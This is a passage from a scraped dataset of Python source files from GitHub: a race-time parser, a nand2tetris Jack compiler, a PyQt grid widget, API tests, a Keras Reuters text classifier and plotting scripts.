start_time)","repo_name":"jnavas-tec/GitHubAnalyzer","sub_path":"data_handler.py","file_name":"data_handler.py","file_ext":"py","file_size_in_byte":17049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"15148796056","text":"# Source of data: https://www.arrs.run/\r\n# This dataset has race times for women 10k runners from the Association of Road Racing Statisticians\r\n# Assume a year has 365.25 days\r\nfrom time import strptime\r\nfrom calendar import monthrange\r\n\r\ndef get_data():\r\n with open('10k_racetimes.txt', 'rt') as file:\r\n content = file.readlines()\r\n return content\r\n\r\n\r\n \r\n \r\ndef get_event_time(lines):\r\n \"\"\"Given a line with Jennifer Rhines' race times from 10k_racetimes.txt, \r\n parse it and return a tuple of (age at event, race time).\r\n Assume a year has 365.25 days\"\"\"\r\n \r\n jens_races = {}\r\n birthdate=\"\"\r\n max=0\r\n max_time=0\r\n for line in lines:\r\n if line[14:29]== \"Jennifer Rhines\":\r\n if int(line[3:5]+line[6:8])>max:\r\n max=int(line[3:5]+line[6:8]) \r\n jens_races[line[0:12].replace(\" \",\"\").replace(\" \",\"\")]=line[56:68].replace(\" \",\"\")\r\n birthdate=line[74:85]\r\n \r\n for time in jens_races.keys():\r\n if int(time[0:2])+ int(time[3:5])/100>max_time:\r\n max_time=int(time[0:2])+ int(time[3:5])/100\r\n max_time_date= jens_races[str(max_time).replace(\".\",\":\")] \r\n return max_time_date, birthdate,str(max_time) \r\ndef get_age_slowest_times():\r\n '''Return a tuple (age, race_time) where:\r\n age: AyBd is in this format where A and B are integers'''\r\n \r\n lines= get_data()\r\n max_date, birthdate,max_time= get_event_time(lines)\r\n max_day=int(max_date[0:2])\r\n birth_day=int(birthdate[0:2])\r\n birth_month=strptime(birthdate[2:5],'%b').tm_mon\r\n max_month= int(strptime(max_date[2:5],'%b').tm_mon)\r\n max_year=int(max_date[-4:])\r\n birth_year=int(birthdate[-5:])\r\n age_year=max_year-birth_year \r\n \r\n for i in range(1,max_month):\r\n max_day+=int(monthrange(max_year,i)[1])\r\n for i in range(1,birth_month):\r\n birth_day+=int(monthrange(birth_year,i)[1]) \r\n \r\n if max_day>birth_day:\r\n age_day=max_day-birth_day\r\n elif max_day HOW MANY ~! => HOWMANY~ \n # NG: HOW MANY ~! => HOW MANY ~! \n if line.startswith(\"\"):\n xml_input += line.strip() \\\n .replace(\" \", \"\") \\\n .replace(\" \", \" \")\n else:\n xml_input += line.strip().replace(\" \", \"\")\n\n # tree = ET.parse(xml_input)\n # self._root = tree.getroot()\n self._root = ET.fromstring(xml_input)\n if self._root.tag != \"tokens\":\n raise RuntimeError(\"The root tag should be '~ '.\")\n self._line_num = 0\n\n self._symbol_table = SymbolTable()\n self._vm_writer = VMWriter(out_vm_path)\n\n self._class_name = None\n self._subroutine_params_num = 0\n self._expression_num = 0\n self._var_dec_num = 0\n self._class_dec_field_num = 0\n self._class_dec_static_num = 0\n self._subroutine_name = \"\"\n self._if_count = 0\n self._while_count = 0\n return\n\n def close(self):\n self._out_file.close()\n self._vm_writer.close()\n return\n\n def compile_class(self):\n self._dump_xml(\"\")\n self._indent += 1\n\n self._output(\"keyword\", \"class\")\n self._class_name = self._text()\n\n self._output(\"identifier\", None)\n self._output(\"symbol\", \"{\")\n\n while self._text() in [\"constructor\", \"function\", \"method\", \"static\", \"field\"]:\n if self._text() in [\"constructor\", \"function\", \"method\"]:\n self._subroutine_type = self._text()\n self.compile_subroutine()\n elif self._text() in [\"static\", \"field\"]:\n self.compile_class_var_dec()\n self._output(\"symbol\", \"}\")\n\n self._indent -= 1\n self._dump_xml(\" \")\n return\n\n def compile_class_var_dec(self):\n self._dump_xml(\"\")\n self._indent += 1\n\n category_kind = Kind.STATIC if self._text() == \"static\" else Kind.FIELD\n\n self._output(\"keyword\", None)\n\n type = self._text()\n if self._text() in [\"int\", \"char\", \"boolean\"]:\n self._output(\"keyword\", None)\n else:\n self._output(\"identifier\", None)\n\n self._symbol_table.define(self._text(), type, category_kind)\n self._output(\"identifier\", None)\n self._countup_class_dec_num(category_kind)\n\n while self._text() == \",\":\n self._output(\"symbol\", \",\")\n self._symbol_table.define(self._text(), type, category_kind)\n self._output(\"identifier\", None)\n self._countup_class_dec_num(category_kind)\n self._output(\"symbol\", \";\")\n\n self._indent -= 1\n self._dump_xml(\" \")\n return\n\n def _countup_class_dec_num(self, category_kind):\n if category_kind is Kind.STATIC:\n self._class_dec_static_num += 1\n else:\n self._class_dec_field_num += 1\n\n def compile_subroutine(self):\n\n self._symbol_table.start_subroutine()\n\n self._dump_xml(\"\")\n self._indent += 1\n\n self._output(\"keyword\", None)\n if self._text() in [\"void\", \"int\", \"char\", \"boolean\"]:\n self._output(\"keyword\", None)\n else:\n self._output(\"identifier\", None)\n # subroutine name\n self._subroutine_name = self._text()\n if self._subroutine_type == \"method\":\n self._symbol_table.define(\"this\", self._class_name, Kind.ARG)\n\n self._output(\"identifier\", None)\n self._output(\"symbol\", \"(\")\n\n self._subroutine_params_num = 0\n self.compile_parameter_list()\n\n self._if_count = 0\n self._while_count = 0\n self._output(\"symbol\", \")\")\n self.compile_subroutine_body()\n\n self._indent -= 1\n self._dump_xml(\" \")\n\n return\n\n def compile_subroutine_body(self):\n self._dump_xml(\"\")\n self._indent += 1\n self._output(\"symbol\", \"{\")\n\n self._var_dec_num = 0\n while self._text() == \"var\":\n self.compile_var_dec()\n\n self._vm_writer.write_function(\"{}.{}\".format(self._class_name, self._subroutine_name), self._var_dec_num)\n if self._subroutine_type == \"constructor\":\n self._vm_writer.write_push(\"constant\", self._class_dec_field_num)\n self._vm_writer.write_call(\"Memory.alloc\", 1)\n self._vm_writer.write_pop(\"pointer\", 0)\n elif self._subroutine_type == \"method\":\n self._vm_writer.write_push(\"argument\", 0)\n self._vm_writer.write_pop(\"pointer\", 0)\n\n self.compile_statements()\n\n self._output(\"symbol\", \"}\")\n self._indent -= 1\n self._dump_xml(\" \")\n return\n\n VAR_TYPE_KEYWORDS = [\"int\", \"char\", \"boolean\"]\n\n def compile_parameter_list(self):\n self._dump_xml(\"\")\n self._indent += 1\n\n type = self._text()\n if self._text() in self.VAR_TYPE_KEYWORDS:\n self._output(\"keyword\", None)\n self._symbol_table.define(self._text(), type, Kind.ARG)\n self._output(\"identifier\", None)\n self._subroutine_params_num += 1\n elif self._tag() == \"identifier\":\n self._output(\"identifier\", None)\n self._symbol_table.define(self._text(), type, Kind.ARG)\n self._output(\"identifier\", None)\n self._subroutine_params_num += 1\n\n while self._text() == \",\":\n type = self._text()\n self._output(\"symbol\", \",\")\n if self._text() in self.VAR_TYPE_KEYWORDS:\n self._output(\"keyword\", None)\n self._symbol_table.define(self._text(), type, Kind.ARG)\n self._output(\"identifier\", None)\n self._subroutine_params_num += 1\n elif self._tag() == \"identifier\":\n self._output(\"identifier\", None)\n self._symbol_table.define(self._text(), type, Kind.ARG)\n self._output(\"identifier\", None)\n self._subroutine_params_num += 1\n else:\n break\n\n self._indent -= 1\n self._dump_xml(\" \")\n return\n\n def compile_var_dec(self):\n self._dump_xml(\"\")\n self._indent += 1\n self._output(\"keyword\", \"var\")\n\n type = self._text()\n if self._text() in self.VAR_TYPE_KEYWORDS:\n self._output(\"keyword\", None)\n elif self._tag() == \"identifier\":\n self._output(\"identifier\", None)\n\n while True:\n self._symbol_table.define(self._text(), type, Kind.VAR)\n self._output(\"identifier\", None)\n self._var_dec_num += 1\n if self._text() == \",\":\n self._output(\"symbol\", \",\")\n else:\n break\n\n self._output(\"symbol\", \";\")\n self._indent -= 1\n self._dump_xml(\" \")\n return\n\n def _var_type(self):\n if self._text() in self.VAR_TYPE_KEYWORDS:\n self._output(\"keyword\", None)\n self._output(\"identifier\", None)\n elif self._tag() == \"identifier\":\n self._output(\"identifier\", None)\n self._output(\"identifier\", None)\n return\n\n def compile_statements(self):\n self._dump_xml(\"\")\n self._indent += 1\n\n while self._text() in [\"let\", \"if\", \"while\", \"do\", \"return\"]:\n if self._text() == \"if\":\n self.compile_if()\n elif self._text() == \"let\":\n self.compile_let()\n elif self._text() == \"while\":\n self.compile_while()\n elif self._text() == \"do\":\n self.compile_do()\n else:\n self.compile_return()\n\n self._indent -= 1\n self._dump_xml(\" \")\n return\n\n def compile_do(self):\n self._dump_xml(\"\")\n self._indent += 1\n\n self._output(\"keyword\", \"do\")\n self._compile_subroutine_call()\n self._output(\"symbol\", \";\")\n\n self._indent -= 1\n self._dump_xml(\" \")\n self._vm_writer.write_pop(\"temp\", 0)\n return\n\n def compile_while(self):\n self._dump_xml(\"\")\n self._indent += 1\n label_exp = \"WHILE_EXP\" + str(self._while_count)\n label_end = \"WHILE_END\" + str(self._while_count)\n self._while_count += 1\n\n self._output(\"keyword\", \"while\")\n self._vm_writer.write_label(label_exp)\n\n self._output(\"symbol\", \"(\")\n self.compile_expression()\n self._output(\"symbol\", \")\")\n self._output(\"symbol\", \"{\")\n\n self._vm_writer.write_arithmetic(\"not\")\n self._vm_writer.write_if(label_end)\n\n self.compile_statements()\n self._output(\"symbol\", \"}\")\n\n self._indent -= 1\n self._dump_xml(\" \")\n\n self._vm_writer.write_goto(label_exp)\n self._vm_writer.write_label(label_end)\n return\n\n def compile_let(self):\n self._dump_xml(\"\")\n self._indent += 1\n\n self._output(\"keyword\", \"let\")\n let_identifier = self._text()\n # if left-side var is array\n array_flag = False\n self._output(\"identifier\", None)\n\n if self._text() == \"[\":\n self._output(\"symbol\", \"[\")\n self.compile_expression()\n self._output(\"symbol\", \"]\")\n self._vm_writer.write_push(KIND_VM_MAP.get(self._symbol_table.kind_of(let_identifier)),\n self._symbol_table.index_of(let_identifier))\n self._vm_writer.write_arithmetic(\"add\")\n array_flag = True\n\n self._output(\"symbol\", \"=\")\n self.compile_expression()\n self._output(\"symbol\", \";\")\n\n self._indent -= 1\n self._dump_xml(\" \")\n\n if not array_flag:\n self._vm_writer.write_pop(KIND_VM_MAP.get(\n self._symbol_table.kind_of(let_identifier)),\n self._symbol_table.index_of(let_identifier))\n else:\n self._vm_writer.write_pop(\"temp\", 0)\n self._vm_writer.write_pop(\"pointer\", 1)\n self._vm_writer.write_push(\"temp\", 0)\n self._vm_writer.write_pop(\"that\", 0)\n return\n\n def compile_return(self):\n self._dump_xml(\"\")\n self._indent += 1\n\n self._output(\"keyword\", \"return\")\n if self._text() != \";\":\n self.compile_expression()\n else:\n self._vm_writer.write_push(\"constant\", 0)\n self._output(\"symbol\", \";\")\n self._vm_writer.write_return()\n\n self._indent -= 1\n self._dump_xml(\" \")\n return\n\n def compile_if(self):\n self._dump_xml(\"\")\n self._indent += 1\n\n true_label = \"IF_TRUE\" + str(self._if_count)\n false_label = \"IF_FALSE\" + str(self._if_count)\n end_label = \"IF_END\" + str(self._if_count)\n # this count should be counted-up after making these labels immediately\n self._if_count += 1\n\n self._output(\"keyword\", \"if\")\n self._output(\"symbol\", \"(\")\n self.compile_expression()\n self._output(\"symbol\", \")\")\n\n self._vm_writer.write_if(true_label)\n self._vm_writer.write_goto(false_label)\n self._vm_writer.write_label(true_label)\n\n self._output(\"symbol\", \"{\")\n self.compile_statements()\n self._output(\"symbol\", \"}\")\n\n if self._text() == \"else\":\n self._vm_writer.write_goto(end_label)\n self._vm_writer.write_label(false_label)\n\n self._output(\"keyword\", \"else\")\n self._output(\"symbol\", \"{\")\n self.compile_statements()\n self._output(\"symbol\", \"}\")\n\n self._vm_writer.write_label(end_label)\n else:\n self._vm_writer.write_label(false_label)\n\n self._indent -= 1\n self._dump_xml(\" \")\n\n return\n\n def compile_expression(self):\n self._dump_xml(\"\")\n self._indent += 1\n\n command = None\n\n self.compile_term()\n while self._text() in [\"+\", \"-\", \"*\", \"/\", \"=\", \"&\", \"|\", \"<\", \">\"]:\n\n if self._text() == \"+\":\n command = \"add\"\n elif self._text() == \"-\":\n command = \"sub\"\n elif self._text() == \"*\":\n command = \"call Math.multiply 2\"\n elif self._text() == \"/\":\n command = \"call Math.divide 2\"\n elif self._text() == \">\":\n command = \"gt\"\n elif self._text() == \"<\":\n command = \"lt\"\n elif self._text() == \"&\":\n command = \"and\"\n elif self._text() == \"=\":\n command = \"eq\"\n elif self._text() == \"|\":\n command = \"or\"\n\n self._output(\"symbol\", None)\n self.compile_term()\n\n if command is not None: self._vm_writer.write_arithmetic(command)\n\n self._indent -= 1\n self._dump_xml(\" \")\n return\n\n def compile_term(self):\n self._dump_xml(\"\")\n self._indent += 1\n\n if self._tag() == \"integerConstant\":\n self._vm_writer.write_push(\"constant\", int(self._text()))\n self._output(\"integerConstant\", None)\n\n elif self._tag() == \"stringConstant\":\n self._compile_string_constant()\n\n elif self._tag() == \"keyword\" and self._text() in [\"true\", \"false\", \"this\", \"null\"]:\n if self._text() == \"true\":\n self._vm_writer.write_push(\"constant\", 0)\n self._vm_writer.write_arithmetic(\"not\")\n elif self._text() == \"false\":\n self._vm_writer.write_push(\"constant\", 0)\n elif self._text() == \"this\":\n self._vm_writer.write_push(\"pointer\", 0)\n elif self._text() == \"null\":\n self._vm_writer.write_push(\"constant\", 0)\n self._output(\"keyword\", None)\n\n elif self._tag() == \"identifier\":\n # fetch a advanced element.\n next_element = self._root[self._line_num + 1]\n\n if next_element.text == \"[\":\n identifier = self._text()\n self._output(\"identifier\", None)\n self._output(\"symbol\", \"[\")\n self.compile_expression()\n self._output(\"symbol\", \"]\")\n self._vm_writer.write_push(KIND_VM_MAP.get(self._symbol_table.kind_of(identifier)),\n self._symbol_table.index_of(identifier))\n self._vm_writer.write_arithmetic(\"add\")\n self._vm_writer.write_pop(\"pointer\", 1)\n self._vm_writer.write_push(\"that\", 0)\n\n elif next_element.text in [\"(\", \".\"]:\n self._compile_subroutine_call()\n\n else:\n self._vm_writer.write_push(KIND_VM_MAP.get(self._symbol_table.kind_of(self._text())),\n self._symbol_table.index_of(self._text()))\n self._output(\"identifier\", None)\n\n\n elif self._tag() == \"symbol\" and self._text() == \"(\":\n self._output(\"symbol\", \"(\")\n self.compile_expression()\n self._output(\"symbol\", \")\")\n\n elif self._tag() == \"symbol\" and self._text() in [\"-\", \"~\"]:\n unary_operator = self._text()\n self._output(\"symbol\", None)\n self.compile_term()\n if unary_operator == \"-\":\n self._vm_writer.write_arithmetic(\"neg\")\n else:\n self._vm_writer.write_arithmetic(\"not\")\n\n self._indent -= 1\n self._dump_xml(\" \")\n return\n\n def _compile_string_constant(self):\n string = self._text()\n self._vm_writer.write_push(\"constant\", len(string))\n self._vm_writer.write_call(\"String.new\", 1)\n for elem in string:\n # jack string is mapped to ASCII code table\n self._vm_writer.write_push(\"constant\", ord(elem))\n self._vm_writer.write_call(\"String.appendChar\", 2)\n self._output(\"stringConstant\", None)\n return\n\n def _compile_subroutine_call(self):\n\n self._expression_num = 0\n\n method = self._text()\n\n # The case of new method\n if (self._symbol_table.kind_of(method) != Kind.NONE):\n instance_name = method\n method = self._symbol_table.type_of(method)\n self._expression_num += 1\n self._vm_writer.write_push(KIND_VM_MAP.get(self._symbol_table.kind_of(instance_name)),\n self._symbol_table.index_of(instance_name))\n\n self._output(\"identifier\", None)\n\n if self._text() == \"(\":\n method = self._class_name + \".\" + method\n self._expression_num += 1\n self._vm_writer.write_push(\"pointer\", 0)\n self._output(\"symbol\", \"(\")\n self.compile_expression_list()\n self._output(\"symbol\", \")\")\n elif self._text() == \".\":\n self._output(\"symbol\", \".\")\n method += \".\" + self._text()\n self._output(\"identifier\", None)\n self._output(\"symbol\", \"(\")\n self.compile_expression_list()\n self._output(\"symbol\", \")\")\n\n self._vm_writer.write_call(method, self._expression_num)\n self._expression_num = 0\n return\n\n def compile_expression_list(self):\n self._dump_xml(\"\")\n self._indent += 1\n\n # XXX: It seems a bad check condition...\n if self._text() != \")\":\n self.compile_expression()\n self._expression_num += 1\n while self._text() == \",\":\n self._output(\"symbol\", \",\")\n self.compile_expression()\n self._expression_num += 1\n\n self._indent -= 1\n self._dump_xml(\" \")\n return\n\n PADDING = \" \"\n\n def _dump_xml(self, string):\n self._out_file.write(self.PADDING * self._indent + string + \"\\n\")\n\n def _output(self, tag, checked=None):\n e = self._element()\n if e.tag == tag and (checked is None or e.text == checked):\n elem = ET.Element(tag)\n elem.text = \" {} \".format(e.text)\n xml_str = ET.tostring(elem).decode()\n self._dump_xml(xml_str)\n # else:\n # raise RuntimeError(\"Compile Error\")\n self._advance()\n\n def _output_identifier(self, category, index, is_defined):\n e = self._element()\n if e.tag == \"identifier\":\n elem = ET.Element(\"identifier\")\n elem.text = \" {} \".format(e.text)\n xml_str = ET.tostring(elem).decode()\n self._dump_xml(xml_str)\n # else:\n # raise RuntimeError(\"Compile Error\")\n self._advance()\n\n def _element(self):\n return self._root[self._line_num]\n\n def _tag(self):\n return self._root[self._line_num].tag\n\n def _text(self):\n return self._root[self._line_num].text\n\n def _advance(self):\n self._line_num += 1\n return\n\n def _strip_text(self):\n rm_head = re.sub(r'^\\s', '', self._text())\n return re.sub(r'\\s$', '', rm_head)\n","repo_name":"koucs/nand2tetris","sub_path":"11/jac/jac/ex_compilation_engine.py","file_name":"ex_compilation_engine.py","file_ext":"py","file_size_in_byte":20301,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"70101302627","text":"from PyQt6.QtWidgets import QGraphicsLineItem, QGraphicsItem, QWidget\nfrom PyQt6.QtCore import Qt, QRectF\nfrom PyQt6.QtGui import QPen, QColor\n\nclass Grid(QGraphicsItem):\n def __init__(self, size=0, n=0, parent=None) -> None:\n super().__init__(parent)\n self.size = size\n self.n = n\n self.lines = []\n\n self.step = self.size//n\n\n pen = QPen(QColor(\"#66000000\"))\n pen.setWidth(2)\n pen.setStyle(Qt.PenStyle.DashLine)\n pen.setDashPattern([2,2])\n for i in range(1,self.n):\n x = i*self.step\n line = QGraphicsLineItem(x,0,x,self.size)\n line.setPen(pen)\n self.lines.append(line)\n for j in range(1,self.n):\n y = j*self.step\n line = QGraphicsLineItem(0,y,self.size,y)\n line.setZValue(1)\n line.setPen(pen)\n self.lines.append(line)\n self.setZValue(1)\n\n def boundingRect(self):\n return QRectF(0,0,self.size,self.size)\n\n def paint(self, painter,option, widget):\n for line in self.lines:\n line.paint(painter,option,widget)","repo_name":"majikat768/HuntStatsLogger","sub_path":"src/MapWindow/Grid.py","file_name":"Grid.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"70"}
+{"seq_id":"28507282333","text":"#!/usr/bin/python3\n\nimport requests\n\nrootUrl = 'http://api.arbetsformedlingen.se:80/af/v2/'\n\napiVersionReq = requests.get(rootUrl + 'forecasts/version')\nforecastsListReq = requests.get(rootUrl + 'forecasts/occupationalArea/forcastsRefs/list')\n\n#Check tjat its alive and no change\ndef test_apiVersion():\n assert apiVersionReq.status_code == 200\n assert apiVersionReq.text == '1.0.70'\n\n\n#Get any OccupationalAreaId and return json object\ndef getOccupationalAreaId(id):\n return requests.get(rootUrl + 'forecasts/occupationalArea/forcastsRefs/list/' + str(id))\n\n\n#Verify first object in list\ndef test_occupationalAreaId():\n occupationalAreaIdList = []\n occupationalAreaIdObj = getOccupationalAreaId(5).json()\n for element in occupationalAreaIdObj[0]['occupationPrognosisRefs']: #use to improve test\n occupationalAreaIdList.append(element)\n assert occupationalAreaIdObj[0]['occupationPrognosisRefs'][0]['heading'] == 'Marknadsanalytiker och marknadsförare'\n assert (occupationalAreaIdList[0]['heading']) == 'Marknadsanalytiker och marknadsförare' #same but make more tests\n\n","repo_name":"matildak/occupation-forecasts-API","sub_path":"test_yrkesprognoser.py","file_name":"test_yrkesprognoser.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"9829442027","text":"#문장(시계열수치)입력 다중클래스분류 모델 레시피5\n\n#순환 컨볼루션 신경망 모델\n#컨볼루션 레이어에서 나온 특징벡터들을 맥스풀링를 통해 1/4로 줄여준 다음 LSTM의 입력으로 넣어주는 모델이다. \n#컨볼루션 레이어에서 반환한 118개의 벡터를 1/4로 줄여서 29개를 반환한다. \n#따라서 LSTM 레이어의 timesteps는 49개가 된다. \n#참고로 input_dim은 256이다.\n#model = Sequential()\n#model.add(Embedding(max_features, 128, input_length=text_max_words))\n#model.add(Dropout(0.2))\n#model.add(Conv1D(256,\n# 3,\n# padding='valid',\n# activation='relu',\n# strides=1))\n#model.add(MaxPooling1D(pool_size=4))\n#model.add(LSTM(128))\n#model.add(Dense(46, activation='softmax'))\n\n# 0. 사용할 패키지 불러오기\nfrom keras.datasets import reuters\nfrom keras.utils import np_utils\nfrom keras.preprocessing import sequence\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Embedding, LSTM\nfrom keras.layers import Flatten, Dropout\nfrom keras.layers import Conv1D, MaxPooling1D\n\nmax_features = 15000\ntext_max_words = 120\n\n# 1. 데이터셋 생성하기\n\n# 훈련셋과 시험셋 불러오기\n(x_train, y_train), (x_test, y_test) = reuters.load_data(num_words=max_features)\n\n# 훈련셋과 검증셋 분리\nx_val = x_train[7000:]\ny_val = y_train[7000:]\nx_train = x_train[:7000]\ny_train = y_train[:7000]\n\n# 데이터셋 전처리 : 문장 길이 맞추기\nx_train = sequence.pad_sequences(x_train, maxlen=text_max_words)\nx_val = sequence.pad_sequences(x_val, maxlen=text_max_words)\nx_test = sequence.pad_sequences(x_test, maxlen=text_max_words)\n\n# one-hot 인코딩\ny_train = np_utils.to_categorical(y_train)\ny_val = np_utils.to_categorical(y_val)\ny_test = np_utils.to_categorical(y_test)\n\n# 2. 모델 구성하기\nmodel = Sequential()\nmodel.add(Embedding(max_features, 128, input_length=text_max_words))\nmodel.add(Dropout(0.2))\nmodel.add(Conv1D(256,\n 3,\n padding='valid',\n activation='relu',\n strides=1))\nmodel.add(MaxPooling1D(pool_size=4))\nmodel.add(LSTM(128))\nmodel.add(Dense(46, activation='softmax'))\n\n# 3. 모델 학습과정 설정하기\nmodel.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n\n# 4. 모델 학습시키기\nhist = model.fit(x_train, y_train, epochs=10, batch_size=64, validation_data=(x_val, y_val))\n\n# 5. 학습과정 살펴보기\nimport matplotlib.pyplot as plt\n\nfig, loss_ax = plt.subplots()\n\nacc_ax = loss_ax.twinx()\n\nloss_ax.plot(hist.history['loss'], 'y', label='train loss')\nloss_ax.plot(hist.history['val_loss'], 'r', label='val loss')\nloss_ax.set_ylim([0.0, 3.0])\n\nacc_ax.plot(hist.history['accuracy'], 'b', label='train acc')\nacc_ax.plot(hist.history['val_accuracy'], 'g', label='val acc')\nacc_ax.set_ylim([0.0, 1.0])\n\nloss_ax.set_xlabel('epoch')\nloss_ax.set_ylabel('loss')\nacc_ax.set_ylabel('accuracy')\n\nloss_ax.legend(loc='upper left')\nacc_ax.legend(loc='lower left')\n\nplt.show()\n\n# 6. 모델 평가하기\nloss_and_metrics = model.evaluate(x_test, y_test, batch_size=64)\nprint('## evaluation loss and_metrics ##')\nprint(loss_and_metrics)\n\n'''\n학습결과 비교\n단순한 다층퍼셉트론 신경망 모델보다는 순환 레이어나 컨볼루션 레이어를 이용한 모델의 성능이 더 높았습니다.\n\n요약\n문장을 입력하여 다중클래스를 분류할 수 있는 여러가지 모델을 살펴보고, 그 성능을 비교해봤습니다. \n시계열 데이터를 처리하기 위한 모델은 다층퍼셉트론 신경망 모델부터 컨볼루션 신경망, 순환 신경망 모델 등 다양하게 구성할 수 있습니다.\n'''\n","repo_name":"Capybara92/python_study","sub_path":"02_Keras_Library/03_FollowRecipe/FollowRecipe_38.py","file_name":"FollowRecipe_38.py","file_ext":"py","file_size_in_byte":3749,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"28389140222","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Oct 7 16:29:37 2021\r\n\r\n@author: obareau\r\n\"\"\"\r\nimport matplotlib.pyplot as plt\r\nimport pickle\r\n\r\n# Load data thanks to StackOverflow \r\nwith open ('devs-outside-time.pickle', 'rb') as f:\r\n data = pickle.load(f)\r\n \r\n# Print(data)\r\n\r\n# Split into two listes\r\n\r\ntime, responses = zip(*data)\r\n\r\nplt.pie(responses, labels=time, autopct='%.2d%%') # Default Python format specifier %2d%% or for a flot %2f%%\r\n# force the x/y to have the same scale\r\n# circle instead of an oval\r\nplt.axis('equal')\r\nplt.title('Daily Time Developer Spend Outside')\r\nplt.show","repo_name":"obareau/DaTaViz","sub_path":"Data-Visualization-Source-Code-up/Data-Visualization-Source-Code/data-viz/matplotlib/pie-olivier.py","file_name":"pie-olivier.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"24702287936","text":"#!/usr/bin/env python3\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport h5py\nfrom functions import is_between\nfrom scipy.interpolate import interp1d\n\ndef hier_calc(j, path, dx_grid):\n print('\\nCalculating moment hierarchy...')\n nbody_filename = 'output_{0:04d}.txt'.format(j)\n nbody_file = np.genfromtxt(path + nbody_filename)\n x_nbody = nbody_file[:,-1]\n v_nbody = nbody_file[:,2]\n\n par_num = x_nbody.size\n L = 1.0\n x_grid = np.arange(0, L, dx_grid)\n N = x_grid.size\n k_grid = np.fft.ifftshift(2.0 * np.pi / L * np.arange(-N/2, N/2))\n x_grid = np.arange(0+dx/2, 1+dx/2, dx_grid)\n\n M0 = np.zeros(x_grid.size)\n M1 = np.zeros(x_grid.size)\n M2 = np.zeros(x_grid.size)\n C1 = np.zeros(x_grid.size)\n C2 = np.zeros(x_grid.size)\n for j in range(x_grid.size):\n if j == x_grid.size-1:\n s = is_between(x_nbody, x_grid[0]-dx/2, x_grid[1]-dx/2)\n else:\n s = is_between(x_nbody, x_grid[j]-dx/2, x_grid[j+1]-dx/2)\n vels = v_nbody[s[0]]\n M0[j] = s[0].size\n C1[j] = sum(vels) / len(vels)\n C2[j] = sum(vels**2) / len(vels)\n\n M0 /= np.mean(M0)\n M1 = M0 * C1\n\n M2 = C2 * M0\n C0 = M0\n return x_grid, M0, M1, M2, C0, C1, C2\n\npath = 'cosmo_sim_1d/sim_k_1_11/run1/'\nj = 0\ndx = 0.01\na = np.genfromtxt(path + 'aout_{0:04d}.txt'.format(j))\n\n\nx, M0, M1, M2, C0, C1, C2 = hier_calc(j, path, dx)\n\nfilename = './hier_test/hier_{0:04d}.hdf5'.format(j)\nfile = h5py.File(filename, 'w')\nfile.create_group('Header')\nheader = file['Header']\na = np.genfromtxt(path + 'aout_{0:04d}.txt'.format(j))\nprint('a = ', a)\nheader.attrs.create('a', a, dtype=float)\nheader.attrs.create('dx', dx, dtype=float)\nmoments = file.create_group('Moments')\nmoments.create_dataset('M0', data=M0)\nmoments.create_dataset('M1', data=M1)\nmoments.create_dataset('M2', data=M2)\nmoments.create_dataset('C0', data=C0)\nmoments.create_dataset('C1', data=C1)\nmoments.create_dataset('C2', data=C2)\nfile.close()\n\n\nfilename = './hier_test/hier_{0:04d}.hdf5'.format(j)\nfile = h5py.File(filename, mode='r')\nheader = file['/Header']\na = header.attrs.get('a')\ndx = header.attrs.get('dx')\n\nmoments = file['/Moments']\nmom_keys = list(moments.keys())\nC0 = np.array(moments[mom_keys[0]])\nC1 = np.array(moments[mom_keys[1]])\nC2 = np.array(moments[mom_keys[2]])\nM0 = np.array(moments[mom_keys[3]])\nM1 = np.array(moments[mom_keys[4]])\nM2 = np.array(moments[mom_keys[5]])\nfile.close()\n\n# C2 -= C1**2\n\nnbody_filename = 'output_{0:04d}.txt'.format(j)\nnbody_file = np.genfromtxt(path + nbody_filename)\nx_nbody = nbody_file[:,-1]\nv_nbody = nbody_file[:,2]\n\nmoments_filename = 'output_hierarchy_{0:04d}.txt'.format(j)\nmoments_file = np.genfromtxt(path + moments_filename)\na = moments_file[:,-1][0]\nx_cell = moments_file[:,0]\nM0_nbody = moments_file[:,2]\nM1_nbody = moments_file[:,4]\nM2_nbody = moments_file[:,6]\n\nplt.rcParams.update({\"text.usetex\": True})\nplt.rcParams.update({\"font.family\": \"serif\"})\nfig, ax = plt.subplots()\nax.set_title(r'$a = {}$'.format(a), fontsize=16)\n\n# arr = M0\n\n# ax.plot(x, arr, c='k', lw=2)\n# ax.plot(x, np.flip(arr), c='r', lw=2, ls='dashed')\n# ax.plot(x, arr-np.flip(arr), c='r', lw=2, ls='dashed')\n\n# ax.plot(x, C2, c='k', lw=2)\nax.plot(x_cell, M0_nbody, c='r', lw=2)\nax.plot(x, M0, c='b', ls='dashed', lw=2)\n\nprint(x.size, M0.size)\n\n# ax.set_xlim(0.995, 1.002)\nax.legend(fontsize=12)\nax.tick_params(axis='both', which='both', direction='in', labelsize=12)\nax.ticklabel_format(scilimits=(-2, 3))\nax.grid(lw=0.2, ls='dashed', color='grey')\nax.yaxis.set_ticks_position('both')\nax.minorticks_on()\n\nplt.show()\n","repo_name":"mandarmk9/eft_code","sub_path":"hier_calc.py","file_name":"hier_calc.py","file_ext":"py","file_size_in_byte":3586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
